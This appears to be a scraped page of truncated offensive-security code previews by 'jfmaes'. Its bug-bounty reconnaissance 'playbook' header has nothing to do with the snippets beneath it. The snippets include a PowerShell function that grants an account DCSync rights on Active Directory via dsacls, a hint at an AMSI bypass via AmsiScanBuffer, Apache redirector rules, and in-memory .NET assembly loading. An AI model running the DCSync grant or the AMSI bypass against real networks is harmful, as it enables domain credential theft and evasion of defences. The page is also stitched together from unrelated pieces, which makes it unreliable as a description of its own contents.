jfmaes

Bug Bounty Hunting: OSINT, Reconnaissance & Attack Surface Mapping Playbook

Executive Summary

Bug bounty hunting in 2026 demands a disciplined, automated approach to reconnaissance that integrates open-source intelligence (OSINT) with continuous asset discovery. Modern attack surface mapping combines passive intelligence gathering, active enumeration, and intelligent automation across multiple attack vectors—subdomains, cloud infrastructure, hidden endpoints, and company-owned infrastructure. This playbook provides a battle-tested methodology and toolchain designed to identify the complete externally-visible attack surface before exploitation.

---

I. Foundation: Understanding Attack Surface Mapping

jfmaes

import argparse
import selenium as se
from selenium import webdriver
from bs4 import BeautifulSoup
import time
def main():
	parser = argparse.ArgumentParser(description = 'extract function definitions from MSDN')
	parser.add_argument('--methods',  help='list of methods',required=True)
	args = parser.parse_args()
	#methods_list = []

jfmaes

ntdll.dll
DbgQueryDebugFilterState from ntdll.dll 
DbgQueryDebugFilterState from ntdll.dll 
DbgQueryDebugFilterState from ntdll.dll 
DbgSetDebugFilterState from ntdll.dll 
EtwpGetCpuSpeed from ntdll.dll 
LdrAccessResource from ntdll.dll 
LdrCallEnclave from ntdll.dll 
LdrProcessRelocationBlockEx from ntdll.dll 
NtQuerySystemTime from ntdll.dll 

jfmaes

        function Invoke-SyncMeUp{
        [CmdletBinding()]
            Param (
            [Parameter(Mandatory=$True)]
            [string]$AccountName
            )
        $dse = [ADSI]"LDAP://Rootdse"
        $namingcontext = $dse.defaultNamingContext
        echo "Giving $AccountName DCSync rights"
        dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes"

jfmaes

import argparse
from ipaddress import IPv4Network
import os


def banner():
    print(r"""
                                                         c=====e
                                                            H
   ____________                                         _,,_H____

jfmaes

Hi SANS Workshop Attendees! Reflection is super fun!

amsi.dll
AmsiScanBuffer
uFcAB4DD

jfmaes

#!/usr/bin/python
import requests
from socket import *
from requests.packages.urllib3.contrib import pyopenssl as reqs
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
import ipaddress
#import asyncio

jfmaes

	# 
	# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	# 
	# Include /etc/apache2/redirect.rules
	#

jfmaes

using System;
using NvisoLib;
using System.Reflection;

namespace AppDomainResolveTest
{
    class Program
    {
        static void Main(string[] args)
        {

jfmaes

clear
$bytes=[System.IO.File]::ReadAllBytes("C:\Users\jeanm\source\repos\HelloFromDotNetFramework\bin\Release\HelloFromDotNetFramework.exe")
$asm = [System.Reflection.Assembly]::Load($bytes)
$params = {null}
[HelloFromDotNetFramework.Program]::Main($params)